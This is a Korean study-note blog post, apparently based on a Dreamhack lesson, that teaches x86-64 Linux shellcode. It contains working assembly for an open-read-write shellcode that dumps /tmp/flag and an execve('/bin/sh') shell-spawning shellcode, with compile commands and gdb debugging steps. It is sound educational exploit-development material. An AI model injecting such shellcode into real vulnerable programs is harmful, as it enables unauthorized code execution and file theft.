[dreamhack] Exploit Tech: Shellcode

1. 서론

익스플로잇

상대 시스템을 공격하는 것

 

셸코드(Shellcode)

익스플로잇을 위해 제작된 어셈블리 코드 조각

어셈블리어로 구성되므로 공격을 수행할 대상 아키텍처와 OS에 따라 다르게 작성된다.

 

 

2. orw 셸코드

orw 셸코드는 파일을 열고, 읽어서 화면에 출력해준다.

 

 

/

 2.1. “/tmp/flag”를 읽는 orw 셸코드 작성해 보기

 

 

c 코드로 표현하면 다음과 같다.

char buf[0x30];
int fd = open("/tmp/flag", RD_ONLY, NULL);
read(fd, buf, 0x30); 
write(1, buf, 0x30);

 

알아야 하는 syscall은 다음과 같다.

syscall	rax	arg0 (rdi)	arg1 (rsi)	arg2 (rdx)
read	0x00	unsigned int fd	char *buf	size_t count
write	0x01	unsigned int fd	const char *buf	size_t count
open	0x02	const char *filename	int flags	umode_t mode

 

int fd = open(“/tmp/flag”, O_RDONLY, NULL)

syscall	rax	arg0 (rdi)	arg1 (rsi)	arg2 (rdx)
open	0x02	const char *filename	int flags	umode_t mode

 

우선 "/tmp/flag"라는 문자열을 메모리에 위치시켜야 한다. 이를 위해 스택에 0x616c662f706d742f67(/tmp/flag)를 push하여 위치시킬 것이다. 스택에는 8바이트 단위로만 값을 push할 수 있으므로 0x67를 먼저 push한 뒤에 0x616c662f706d742f를 push한다. 그리고 rdi가 이를 가리키도록 rsp를 rdi로 옮긴다.

 

//

a l f / p m t / g

0x67은 1바이트(8비트)

 

O_RDONLY는 0이므로, rsi는 0으로 설정한다.

 

파일을 읽을 때, mode는 의미를 갖지 않으므로 rdx는 0으로 설정한다.

 

rax를 open의 syscall 값인 2로 설정한다.

 

구현

push 0x67
mov rax, 0x616c662f706d742f 
push rax
mov rdi, rsp    ; rdi = "/tmp/flag"
xor rsi, rsi    ; rsi = 0 ; RD_ONLY
xor rdx, rdx    ; rdx = 0
mov rax, 2      ; rax = 2 ; syscall_open
syscall         ; open("/tmp/flag", RD_ONLY, NULL)

 

 

//

자기 자신과의 xor 연산은 항상 0

 

 

read(fd, buf, 0x30)

syscall	rax	arg0 (rdi)	arg1 (rsi)	arg2 (rdx)
read	0x00	unsigned int fd	char *buf	size_t count

 

syscall의 반환 값은 rax로 저장된다. 따라서 open의 리턴 파일인 /tmp/flag의 fd는 rax에 저장된다. 

read의 첫 번째 인자를 이 값으로 설정해야 하므로 rax를 rdi에 대입한다.

 

rsi는 파일에서 읽은 데이터를 저장할 주소를 가리킨다. 0x30만큼 읽을 것이므로, rsi에 'rsp-0x30'을 대입한다

 

rdx는 파일로부터 읽어낼 데이터의 길이인 0x30으로 설정한다.

 

read 시스템 콜을 호출하기 위해서 rax를 0으로 설정한다.

 

구현

mov rdi, rax      ; rdi = fd
mov rsi, rsp
sub rsi, 0x30     ; rsi = rsp-0x30 ; buf
mov rdx, 0x30     ; rdx = 0x30     ; len
mov rax, 0x0      ; rax = 0        ; syscall_read
syscall           ; read(fd, buf, 0x30)

 

 

write(1, buf, 0x30)

syscall	rax	arg0 (rdi)	arg1 (rsi)	arg2 (rdx)
write	0x01	unsigned int fd	const char *buf	size_t count

 

출력은 stdout으로 할 것이므로, rdi를 0x1로 설정한다.

 

rsi와 rdx는 read에서 사용한 값을 그대로 사용한다.

 

write 시스템콜을 호출하기 위해서 rax를 1로 설정한다.

 

구현

mov rdi, 1        ; rdi = 1 ; fd = stdout
mov rax, 0x1      ; rax = 1 ; syscall_write
syscall           ; write(fd, buf, 0x30)

 

 

 

종합하면 다음과 같다.

 

;Name: orw.S
push 0x67
mov rax, 0x616c662f706d742f 
push rax
mov rdi, rsp    ; rdi = "/tmp/flag"
xor rsi, rsi    ; rsi = 0 ; RD_ONLY
xor rdx, rdx    ; rdx = 0
mov rax, 2      ; rax = 2 ; syscall_open
syscall         ; open("/tmp/flag", RD_ONLY, NULL)
mov rdi, rax      ; rdi = fd
mov rsi, rsp
sub rsi, 0x30     ; rsi = rsp-0x30 ; buf
mov rdx, 0x30     ; rdx = 0x30     ; len
mov rax, 0x0      ; rax = 0        ; syscall_read
syscall           ; read(fd, buf, 0x30)
mov rdi, 1        ; rdi = 1 ; fd = stdout
mov rax, 0x1      ; rax = 1 ; syscall_write
syscall           ; write(fd, buf, 0x30)

 

 

orw 셸코드 컴파일 및 실행

윈도우의 PE, 리눅스의 ELF처럼 대부분의 OS는 실행 가능한 파일의 형식을 규정하고 있다.

 

위에서 구현한 셸코드 orw.S는 아스키로 작성된 어셈블리 코드이므로

gcc 컴파일을 통한 ELF 형식으로의 변환이 필요하다.

 

스켈레톤 코드에 앞에 작성한 셸코드를 채운다.

 

// File name: orw.c
// Compile: gcc -o orw orw.c -masm=intel
__asm__(
    ".global run_sh\n"
    "run_sh:\n"
    "push 0x67\n"
    "mov rax, 0x616c662f706d742f \n"
    "push rax\n"
    "mov rdi, rsp    # rdi = '/tmp/flag'\n"
    "xor rsi, rsi    # rsi = 0 ; RD_ONLY\n"
    "xor rdx, rdx    # rdx = 0\n"
    "mov rax, 2      # rax = 2 ; syscall_open\n"
    "syscall         # open('/tmp/flag', RD_ONLY, NULL)\n"
    "\n"
    "mov rdi, rax      # rdi = fd\n"
    "mov rsi, rsp\n"
    "sub rsi, 0x30     # rsi = rsp-0x30 ; buf\n"
    "mov rdx, 0x30     # rdx = 0x30     ; len\n"
    "mov rax, 0x0      # rax = 0        ; syscall_read\n"
    "syscall           # read(fd, buf, 0x30)\n"
    "\n"
    "mov rdi, 1        # rdi = 1 ; fd = stdout\n"
    "mov rax, 0x1      # rax = 1 ; syscall_write\n"
    "syscall           # write(fd, buf, 0x30)\n"
    "\n"
    "xor rdi, rdi      # rdi = 0\n"
    "mov rax, 0x3c	   # rax = sys_exit\n"
    "syscall		   # exit(0)");
void run_sh();
int main() { run_sh(); }

 

 

셸코드가 실제로 작동함을 확인하기 위해 /tmp/flag 파일을 생성한다.

echo 'flag{this_is_open_read_write_shellcode!}' > /tmp/flag

 

 

orw.c를 컴파일하고, 실행한다.

$ gcc -o orw orw.c -masm=intel
$ ./orw
flag{this_is_open_read_write_shellcode!}

 

 

셸코드 실행이 성공하면, 저장한 문자열이 출력된다.

 

 

여기서 /tmp/flag의 문자열 이외에 알 수 없는 문자열들이 출력되는 경우가 있다.

초기화되지 않은 가비지 값이 출력된 것이다.

이런 경우 디버깅을 통해 셸 코드의 동작을 알아봐야 한다.

 

 

/

2.2. orw 셸코드 디버깅

 

gdb로 orw를 열고, run_sh()에 브레이크 포인트를 설정한다.

 

$ gdb orw -q
...
pwndbg> b *run_sh
Breakpoint 1 at 0x1129

 

No such file or directory 에러가 발생하였다.

sudo apt-get install libc6-i386 lib32gcc1

 

위의 코드를 입력해주면

lib32gcc1 패키지를 사용할 수 없다는 문구가 뜨는데,

 

 

그래도 이제 파일이 열린다.

 

 

r을 입력해 bp 전까지의 코드를 실행시키자.

작성한 셸 코드에 rip가 위치한 것을 확인할 수 있다.

 

 

 

 

int fd = open("/tmp/flag",O_RDONLY, NULL)

DISASM에서 첫 번째 syscall이 위치한 run_sh+29에 bp를 설정한 뒤,

해당 시점에 syscall에 들어가는 인자를 확인해보자.

 

 

ni로 syscall을 실행하고 나면,

/tmp/flag의 fd(3)이 rax에 저장된다.

 

 

read(fd, buf, 0x30)

두 번째 syscall인 run_sh+55에 bp를 설정한 뒤, 계속 실행한다.

 

새로 할당된 fd(3)에서 0x30바이트만큼의 데이터를 읽어와 0x7fffffffdfd8에 저장한 것을 확인할 수 있다.

 

ni로 syscall을 실행하면,

파일의 문자열이 0x7fffffffdfd8에 저장되었음을 알 수 있다.

x/s 0xfffffffdfd8 명령어로도 확인 가능하다.

 

 

 

 

write(1, buf, 0x30)

 

ni로 계속 실행하면, 데이터를 저장한 0xfffffffdfd8에서 문자열이 출력된다.

 

 

 

/

uninitialized memory

 

가비지 값이 함께 출력되었다면, 파일에서 값을 읽어올 때의 문제일 수 있다.

read syscall을 실행한 직후를 살핀다.

 

파일을 읽어서 스택에 저장했다.

스택을 살피자.

 

 

 

x/6gx 0xfffffffdfd8 명령어를 통해 문자열 외의 널 바이트를 볼 수 있다. 

그곳에 가비지 값이 들어있던 경우일 것이다.

 

 

 

 

 

3. execve 셸 코드

 

execve 셸코드는 execve 시스템 콜만으로 구성된다.

시스템 콜의 종류는 rax로 지칭하고, execve

syscall	rax	arg0 (rdi)	arg1 (rsi)	arg2 (rdx)
execve	0x3b	const char *filename	const char *const *argv	const char *const *envp

파일 지정자 번호 0 : stdin, 1 : stdout, 2 : stderr

argv : 실행파일에 넘겨줄 인자

envp : 환경변수

 

 

지금은 sh만 실행하면 되므로 나머지 값들은 null로 설정해도 상관 없다.

리눅스의 기본 실행 프로그램들은 /bin/ 디렉토리에 저장되어 있으며, sh도 물론 여기에 있다.

 

 

따라서 execve("/bin/sh", null, null)을 실행하는 셸 코드를 작성하자.

 

;Name: execve.S
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp  ; rdi = "/bin/sh\x00"
xor rsi, rsi  ; rsi = NULL
xor rdx, rdx  ; rdx = NULL
mov rax, 0x3b ; rax = sys_execve
syscall       ; execve("/bin/sh", null, null)

 

 

스켈레톤 코드를 이용하여 execve 셸 코드를 컴파일하자.

// File name: execve.c
// Compile Option: gcc -o execve execve.c -masm=intel
__asm__(
    ".global run_sh\n"
    "run_sh:\n"
    "mov rax, 0x68732f6e69622f\n"
    "push rax\n"
    "mov rdi, rsp  # rdi = '/bin/sh'\n"
    "xor rsi, rsi  # rsi = NULL\n"
    "xor rdx, rdx  # rdx = NULL\n"
    "mov rax, 0x3b # rax = sys_execve\n"
    "syscall       # execve('/bin/sh', null, null)\n"
    "xor rdi, rdi   # rdi = 0\n"
    "mov rax, 0x3c	# rax = sys_exit\n"
    "syscall        # exit(0)");
void run_sh();
int main() { run_sh(); }